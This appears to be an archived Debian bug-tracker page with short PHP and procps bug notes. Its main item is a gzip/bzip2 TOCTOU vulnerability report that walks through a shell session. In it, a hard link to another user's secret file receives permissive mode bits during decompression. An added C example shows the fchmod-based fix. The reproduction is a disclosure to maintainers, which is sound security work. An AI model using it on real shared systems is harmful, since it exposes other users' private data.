Bug#445033: upstream 2.0.0 final released, please update
Package: php5-imagick
Version: 2.0.0a2-1

Just a note that 2.0.1 is available upstream.

-- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#348499: tls:// urls don't work anymore since last upgrade in testing
This is perhaps due to a bug in php4: http://bugs.php.net/bug.php?id=35668
Bug#344781: Output buffering cannot be turned off with PHP/FastCGI
The bugfix was included in php-5.1.2 and will probably get into php-4.4.3 as well.
Bug#344781: Output buffering cannot be turned off with PHP/FastCGI
Package: php4-cgi
Version: 4:4.4.0-4
Severity: wishlist

This bug is described at the following URL: http://bugs.php.net/bug.php?id=34429

It is fixed in the php CVS and will be included in the next php release. But because it is very simple and greatly enhances php usability, it would be great if the fix could be included in the next debian package version.
Bug#319523: Acknowledgement (procps: vmstat -p argument stack overflow)
The patch is at the bottom of the vmstat advisory page: http://www.danitrous.org/code/PoCs/vmstat_adv.txt
Bug#303927: gzip TOCTOU file-permissions vulnerability
Joey Hess wrote:
> Martin Pitt wrote:
> [cut]
> Maybe I understood you wrong, could you please give a small test case which describes the vulnerability exactly?

I'm a wimp, so I will use gdb instead of writing some real exploit to win the race. It is quite easy to win the race when the file that's being decompressed is big:

---
# adduser user-good
# adduser user-evil
# usermod -G src user-good
# usermod -G src user-evil
# mkdir /var/www/proj
# chown root.src /var/www/proj
# chmod 2775 /var/www/proj

[EMAIL PROTECTED]:/var/www/proj$ echo Rather secret data > secf.txt
[EMAIL PROTECTED]:/var/www/proj$ chmod 400 secf.txt
[EMAIL PROTECTED]:/var/www/proj$ ls -al secf.txt
-r-------- 1 user-good src 19 Apr 14 09:16 secf.txt

[EMAIL PROTECTED]:/var/www/proj$ dd if=/dev/zero of=bigf.bin bs=1M count=256
[EMAIL PROTECTED]:/var/www/proj$ gzip bigf.bin
[EMAIL PROTECTED]:/var/www/proj$ chmod 666 bigf.bin.gz
[EMAIL PROTECTED]:/var/www/proj$ ls -la secf.txt bigf.bin.gz
-rw-rw-rw- 1 user-evil src 260543 Apr 14 09:17 bigf.bin.gz
-r-------- 1 user-good src 19 Apr 14 09:16 secf.txt
[EMAIL PROTECTED]:/var/www/proj$ cat secf.txt
cat: secf.txt: Permission denied

[EMAIL PROTECTED]:/var/www/proj$ gzip -d bigf.bin.gz

[EMAIL PROTECTED]:/var/www/proj$ rm -f bigf.bin ; ln secf.txt bigf.bin
[EMAIL PROTECTED]:/var/www/proj$ ls -la secf.txt bigf.bin
-rw-rw-rw- 2 user-good src 19 Apr 14 09:17 bigf.bin
-rw-rw-rw- 2 user-good src 19 Apr 14 09:17 secf.txt
[EMAIL PROTECTED]:/var/www/proj$ cat secf.txt
Rather secret data
---

The time between the beginning of decompression and the unlink+delete was about 2 sec., and decompression finished about 7-8 seconds later.

The same was tested and applies to bzip2.

Best regards,
Theodor

--
Theodor Milkov
http://www.zimage.del.bg/
CCNA, CCNP, MCP
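The defensive pattern that closes this class of race, as an added example (not gzip's own code and not part of the message above): apply the input file's permission bits through the still-open output descriptor with fchmod, rather than by path name after the write finishes. The function names, the /tmp scratch directory and the 0400/0666 modes are assumptions constructed to mirror the session above.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create the output file exclusively with a restrictive initial mode, so a
 * pre-placed file or link at that path is refused. Returns fd or -1. */
static int create_output(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Hardened mode copy: fchmod acts on the inode behind the descriptor, so a
 * link swapped in under the path name cannot receive the permission bits.
 * chmod(path, ...) at this point is the pattern the report exploits. */
static int copy_mode_safe(int ofd, mode_t input_mode) {
    return fchmod(ofd, input_mode & 07777);
}

/* Constructed scenario: a 0400 "secf.txt", an output file that gets replaced
 * by a hard link to it while the descriptor is still open, then the mode copy.
 * Returns 1 if the victim keeps 0400 and our own inode got 0666, else 0. */
int demo_fd_based_chmod(void) {
    char dir[] = "/tmp/toctou-demoXXXXXX", out[256], victim[256];
    if (!mkdtemp(dir)) return 0;
    snprintf(out, sizeof out, "%s/bigf.bin", dir);
    snprintf(victim, sizeof victim, "%s/secf.txt", dir);
    int vfd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0400);
    if (vfd < 0) return 0;
    close(vfd);
    int ofd = create_output(out);
    if (ofd < 0) return 0;
    /* the race window: the path now names the victim's inode, not ours */
    unlink(out);
    if (link(victim, out) != 0) { close(ofd); return 0; }
    int rc = copy_mode_safe(ofd, 0666);      /* input was chmod 666 */
    struct stat ours, theirs;
    fstat(ofd, &ours);
    stat(victim, &theirs);
    close(ofd);
    unlink(out); unlink(victim); rmdir(dir);
    return rc == 0 && (ours.st_mode & 07777) == 0666
                   && (theirs.st_mode & 07777) == 0400;
}

int main(void) { return demo_fd_based_chmod() ? 0 : 1; }
```

The same reasoning applies to ownership (fchown on the descriptor) and to bzip2's equivalent code path.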